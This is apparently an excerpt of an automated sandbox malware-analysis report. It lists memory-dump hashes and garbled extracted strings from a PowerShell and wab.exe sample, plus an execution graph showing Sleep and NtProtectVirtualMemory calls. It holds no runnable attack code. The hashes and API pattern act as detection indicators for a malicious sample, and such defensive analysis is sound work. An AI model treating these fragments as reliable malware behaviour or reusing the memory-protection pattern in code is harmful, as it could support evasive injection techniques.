                                                        • Opcode ID: d8fd1af02e79388de410726a815abf9dd9e6e69a41fc8097af8592c18c5bbb17
                                                        • Instruction ID: 3c9118c27f152b28b9d16de017f4afa0925c8309c23fd5aa1bc616e4440d28e6
                                                        • Opcode Fuzzy Hash: d8fd1af02e79388de410726a815abf9dd9e6e69a41fc8097af8592c18c5bbb17
                                                        • Instruction Fuzzy Hash: C12147F1D043499FCB149F7988442ADBBF4AF95200F2985BAD819EB352E7319D84CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 675dd83053929b6f56d239690b302a59de9bc40178368ef1bc2fd4eb66a8a842
                                                        • Instruction ID: 45cb80813446e575c5d19a81836dc5f4c0bf74de13294aa61deb44e91d8c7c86
                                                        • Opcode Fuzzy Hash: 675dd83053929b6f56d239690b302a59de9bc40178368ef1bc2fd4eb66a8a842
                                                        • Instruction Fuzzy Hash: BF21A9F0704389ABD7310B2688107367BE65FC6240F18857AA948CF3C6E5B4988483B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec46688dbf6edcb07aadce535e7a67933701a8a1ce633c9db08a37e821cda192
                                                        • Instruction ID: 49969ab88595bba867247afa0041bb2406d1ec41046976ccaec40f17108a86cc
                                                        • Opcode Fuzzy Hash: ec46688dbf6edcb07aadce535e7a67933701a8a1ce633c9db08a37e821cda192
                                                        • Instruction Fuzzy Hash: 420147B630021EDBC72457AAE50057BBBE99BC6222F14C63FD559CB210C632C896C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4350000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45251d7ebd4d89d4cc30c96a5647e5dbe1aa13919abb92c790e892c9a7f1b393
                                                        • Instruction ID: 393925d1995cd68499946efadd5be3610e7687795d10a265d5ddad79ec937464
                                                        • Opcode Fuzzy Hash: 45251d7ebd4d89d4cc30c96a5647e5dbe1aa13919abb92c790e892c9a7f1b393
                                                        • Instruction Fuzzy Hash: 94110734A00209AFDB45DF98D884E9DFBB2FF48310F289558E805AB365C771E982CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3483019856.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_99d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 509ed69884fa19917ffa6131fc18dc398a715c34ca52e28b835d6d326ce80f3d
                                                        • Instruction ID: cc4ee1c7bd1aa0cc14b7cddbaad9ae2f2cce070f4b1550cd94cd181462119f3c
                                                        • Opcode Fuzzy Hash: 509ed69884fa19917ffa6131fc18dc398a715c34ca52e28b835d6d326ce80f3d
                                                        • Instruction Fuzzy Hash: 7601D67140A3449AEB108A2DCDC4B67FF9CEF45324F18C92AED484B246C679D941CAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3483019856.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_99d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b642b97ae6297f410924717f30e34bd6073a893321d4d4bec972ac9322906cba
                                                        • Instruction ID: a4fc4290b2d9e71edeb4c9bc5c89549faae0a51c37b19078775d37fdc88b312a
                                                        • Opcode Fuzzy Hash: b642b97ae6297f410924717f30e34bd6073a893321d4d4bec972ac9322906cba
                                                        • Instruction Fuzzy Hash: 5901526100E3C05FD7124B258C94752BFB8EF53224F1DC1DBD9888F1A7C2695849C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$d5wk$tP^q$tP^q$$^q$$^q$$^q$$^q$}l$}l
                                                        • API String ID: 0-1839267178
                                                        • Opcode ID: 8b8879772778a9068790aa024f9a87af86600f062adeb06689bd045937511122
                                                        • Instruction ID: 24a60dd3ee9963bba8c6553fce0b751721196d09ef822d83930193aab10f023e
                                                        • Opcode Fuzzy Hash: 8b8879772778a9068790aa024f9a87af86600f062adeb06689bd045937511122
                                                        • Instruction Fuzzy Hash: 59E165F1B443069FCB759A78890076ABBE6AFC2310F149ABAD455CF351DB31C849CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                        • API String ID: 0-459999756
                                                        • Opcode ID: 32dad24c1c21737c3cb43d3cbec12494b8af1a14c550f79c1e42780a51fa43ca
                                                        • Instruction ID: 0700579d72f89bb52960206ea13d98d86af8f22a7b2ab8517304d5c0fd4e226b
                                                        • Opcode Fuzzy Hash: 32dad24c1c21737c3cb43d3cbec12494b8af1a14c550f79c1e42780a51fa43ca
                                                        • Instruction Fuzzy Hash: CBA1D5F1B001199FDB659F68C90466EBBE2BF84310F248A79E8059B395CB31ED45C7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$}l$}l
                                                        • API String ID: 0-1609486564
                                                        • Opcode ID: 23338f9a24d5753b4d41cbb0a0aea2d8cae13ffca31bb71614c6e4870b2655fc
                                                        • Instruction ID: 56f7ee126f31f4b32ffeb89c2804d2b7f5ec4969190e18fd81ff89fb6d5f27a4
                                                        • Opcode Fuzzy Hash: 23338f9a24d5753b4d41cbb0a0aea2d8cae13ffca31bb71614c6e4870b2655fc
                                                        • Instruction Fuzzy Hash: 72A157F27043068FCB359A28890076ABBE6AFC2720F14897EE445CF391DB32D845C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$tLyk$x.xk$-xk
                                                        • API String ID: 0-1698909105
                                                        • Opcode ID: 34ff21050d194cada52320ef6828d0eb74d8e962095c185d8f965a2ffabf2842
                                                        • Instruction ID: 187142496cb50771be09aecdf41426683ab67fe3bc3a2f9c3599670291e696d7
                                                        • Opcode Fuzzy Hash: 34ff21050d194cada52320ef6828d0eb74d8e962095c185d8f965a2ffabf2842
                                                        • Instruction Fuzzy Hash: 6D022CB4A102189FCB64DB28CA54BDEBBF2BF88304F1085A9D4096B755DB31ED85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                        • API String ID: 0-578306960
                                                        • Opcode ID: fabb4dd8e497e6d638be5c1cb99db71907809df9c50e7263fe07b5c2a0aecddd
                                                        • Instruction ID: 85a7c69d148e543a54f8175f3576d2c16143efd72944a80787f68f726a71b057
                                                        • Opcode Fuzzy Hash: fabb4dd8e497e6d638be5c1cb99db71907809df9c50e7263fe07b5c2a0aecddd
                                                        • Instruction Fuzzy Hash: B4D10830B002089FDB559F68D41066ABBE6EFC4320F24886EE8059F792DB32DD45CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                        • API String ID: 0-3997570045
                                                        • Opcode ID: a500d496d85407fd6f6e0305f8ca8c1f59a0171a3678afb9816322e147958589
                                                        • Instruction ID: 8e27a510f3e766798fc10dd183ea616c19c172f858c747de3eaf1ccbd381865d
                                                        • Opcode Fuzzy Hash: a500d496d85407fd6f6e0305f8ca8c1f59a0171a3678afb9816322e147958589
                                                        • Instruction Fuzzy Hash: 4A61E4F0A0020BEFDB688E14C644BBA77F2BB85351F588675E8159B2A0D771FC85CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                        • API String ID: 0-3997570045
                                                        • Opcode ID: c822fad5548d5f615a850e8be8e721964f97a1be32de91008eb1482d15a01880
                                                        • Instruction ID: e96fd046411ba86cb2f21268e1b212cf589fd9ff35bf89e266a010abe00ff653
                                                        • Opcode Fuzzy Hash: c822fad5548d5f615a850e8be8e721964f97a1be32de91008eb1482d15a01880
                                                        • Instruction Fuzzy Hash: 5C51C1F0A0020BEFDB688E14CA44BAA77F1BB85341F588675E8119B2A1D771FD85CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                        • API String ID: 0-3272787073
                                                        • Opcode ID: 61d2d1eb80cf04e0d9df7fec252c9e311dd0a704e8c787c8176e26bc632a51f1
                                                        • Instruction ID: 1395b38abe2f9979775a8dcfa6e8df865c8cc156310ccff1752058f365f36bce
                                                        • Opcode Fuzzy Hash: 61d2d1eb80cf04e0d9df7fec252c9e311dd0a704e8c787c8176e26bc632a51f1
                                                        • Instruction Fuzzy Hash: 1341E7F0B04306DFCB655A7489106AF7BE1EFC2210F1485BADA05DB295EB36C945C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                        • API String ID: 0-3272787073
                                                        • Opcode ID: 087dac2c5cdb1f5f8408c944bbb361f7950beaf857103adf7bc2d2774fc643cc
                                                        • Instruction ID: b26a9f4adb6447eba7c2678854d1126524a5c965a5bb4053d1e32eed3ba3505e
                                                        • Opcode Fuzzy Hash: 087dac2c5cdb1f5f8408c944bbb361f7950beaf857103adf7bc2d2774fc643cc
                                                        • Instruction Fuzzy Hash: 5A316BF2B04306CFCB664A79D80857AB7D5BFC2A12F2486BAC4568A245DE36C845C751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tP^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-324510305
                                                        • Opcode ID: 07553090913025054d6b1b83f8ad5aae6ca99d7479814b8b46432963e8397121
                                                        • Instruction ID: b46b6c043aae7222d0d815f0476577221ee1715228c8e31ff05ee3708eeb6159
                                                        • Opcode Fuzzy Hash: 07553090913025054d6b1b83f8ad5aae6ca99d7479814b8b46432963e8397121
                                                        • Instruction Fuzzy Hash: 0D21C176E00218CFDB648E55C544A6BB7E8AFA4B30F24446EE9049F755EB32DD04CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$(o^q$(o^q$(o^q
                                                        • API String ID: 0-1978863864
                                                        • Opcode ID: c7f2f7a68d218af73a7f719e46682f2ceaa87022faf0a372e614db311f53cc3c
                                                        • Instruction ID: d8172e7f375d9bc50237c2c2229fff7dfe54a9bff3409940a61e34e50bd616f2
                                                        • Opcode Fuzzy Hash: c7f2f7a68d218af73a7f719e46682f2ceaa87022faf0a372e614db311f53cc3c
                                                        • Instruction Fuzzy Hash: ACF147F1704306DFCB659F69C81476ABBE2EF81310F14857AEA158B291DB31D845CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4350000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ^xk$dPrq$vn^$vn^
                                                        • API String ID: 0-4164044534
                                                        • Opcode ID: b4944b648e08970a01d6590b28320dac9ebc679ac9989d4fe068678e0bb6d5fb
                                                        • Instruction ID: 3bd005ba8cf7fb1b57793d6299912714f7b668f0eacabe8f7a327027bf43cd2e
                                                        • Opcode Fuzzy Hash: b4944b648e08970a01d6590b28320dac9ebc679ac9989d4fe068678e0bb6d5fb
                                                        • Instruction Fuzzy Hash: 1AF1BC9285FBE11FE713AB38A9B45957FB09D5322471A14D3C4C0CF0B3E549A98DC3AA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                        • API String ID: 0-1420252700
                                                        • Opcode ID: 1d9decb27f50051e0ffc8ee36b8e149f74474252eb51f70380d02ff458e4173e
                                                        • Instruction ID: 7c7c943c76d96774da5acc2e592269dee717627d5aea300af49f9ec6b52edfdf
                                                        • Opcode Fuzzy Hash: 1d9decb27f50051e0ffc8ee36b8e149f74474252eb51f70380d02ff458e4173e
                                                        • Instruction Fuzzy Hash: FFD13931B042458FD7659B69C51066ABBEAAFC1230B2888BFD405CBB57DB32CC45C7A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tP^q$tP^q$tP^q$tP^q
                                                        • API String ID: 0-91886675
                                                        • Opcode ID: c1a002be27b87be98182c9fef885c953043bc512a84c2c56431bc0e99dbd292d
                                                        • Instruction ID: 8d8ab5f6f210db9b58d47abddc10f9bd594fe1975b927dddb9346ef87910f32b
                                                        • Opcode Fuzzy Hash: c1a002be27b87be98182c9fef885c953043bc512a84c2c56431bc0e99dbd292d
                                                        • Instruction Fuzzy Hash: 65C1A335F002099FDB54DF68C554A6ABBE6FB88720F248869E8019F750DB31DD45CBE2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XRcq$XRcq$tP^q$$^q
                                                        • API String ID: 0-3596674671
                                                        • Opcode ID: 3d51739bf23562919c1afdb590ca6210f5c23ddbcdf1a666a03dddb5030b3092
                                                        • Instruction ID: a2559f2bd7b3799dd56d692282d47aad855bde7a94ef366bdd6a90cdfcbf7ccf
                                                        • Opcode Fuzzy Hash: 3d51739bf23562919c1afdb590ca6210f5c23ddbcdf1a666a03dddb5030b3092
                                                        • Instruction Fuzzy Hash: D641A3F1A00207DBDB64CE19C244A6AB7F2AF85711F2DC2B9E814AB255C771FD40CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 371912de3ef0f5fff7d138e0acfd4d12aa0101e2e828c9d0efc483a343637908
                                                        • Instruction ID: 0dc7145e72a6b03dd660063653051eadcce7bb567bee76c53c83741cfd9120ed
                                                        • Opcode Fuzzy Hash: 371912de3ef0f5fff7d138e0acfd4d12aa0101e2e828c9d0efc483a343637908
                                                        • Instruction Fuzzy Hash: B131F1F7B8420ADFDB648E61CA016AAB7F1EB82221F14C27BD8658B242D7318555CBD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: d1e75586ff6100cc72b45015b43c71bf21ed56b0e5e69d538cf7bf6b8dd33012
                                                        • Instruction ID: 6d7a6c2a6f6291b559ac37fc270db86715ad5fdf5e202fb14b1f684c1cb9457d
                                                        • Opcode Fuzzy Hash: d1e75586ff6100cc72b45015b43c71bf21ed56b0e5e69d538cf7bf6b8dd33012
                                                        • Instruction Fuzzy Hash: 00217DF132030A6BDB74996A9C00B2BB6D66FC1710F24893AE409CF385DD76F844C360
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                        • API String ID: 0-2049395529
                                                        • Opcode ID: 5957b4b7471ec428882149aac36a625441c7b24801987b3922cd795789080423
                                                        • Instruction ID: d7ff50415910e5e12fe554fa12431c11965f67e24cd4a06842bcf945d62e0054
                                                        • Opcode Fuzzy Hash: 5957b4b7471ec428882149aac36a625441c7b24801987b3922cd795789080423
                                                        • Instruction Fuzzy Hash: 8101F7A07093866FC73A422859246696FF66FC3601B198AFBD040DF357CE158C49C3A3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:1.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:100%
                                                        Total number of Nodes:5
                                                        Total number of Limit Nodes:1
                                                        execution_graph 414 82cad3d 415 82ca224 414->415 416 82cad54 414->416 416->414 417 82cadaa Sleep 416->417 418 82cadb1 NtProtectVirtualMemory 416->418 417->414 418->416

                                                        Control-flow Graph

                                                        APIs
                                                        • Sleep.KERNEL32(00000005), ref: 082CADAC
                                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 082CADEF
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4107392324.0000000007D30000.00000040.00000400.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_7d30000_wab.jbxd
                                                        Similarity
                                                        • API ID: MemoryProtectSleepVirtual
                                                        • String ID:
                                                        • API String ID: 3235210055-0
                                                        • Opcode ID: 5a5076daf8b6331ce082d9166c0cdd03f4fa7de8a5b42f010fe0e41a4e1e81ae
                                                        • Instruction ID: dc4aec1374193221c42dd75d49f5e5d70bb5846eb963124a37dce30b94c2fb74
                                                        • Opcode Fuzzy Hash: 5a5076daf8b6331ce082d9166c0cdd03f4fa7de8a5b42f010fe0e41a4e1e81ae
                                                        • Instruction Fuzzy Hash: 871103F65503159FD7009A24D98CB9A77B1AF24366F858248DC825B1E1D3798885CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%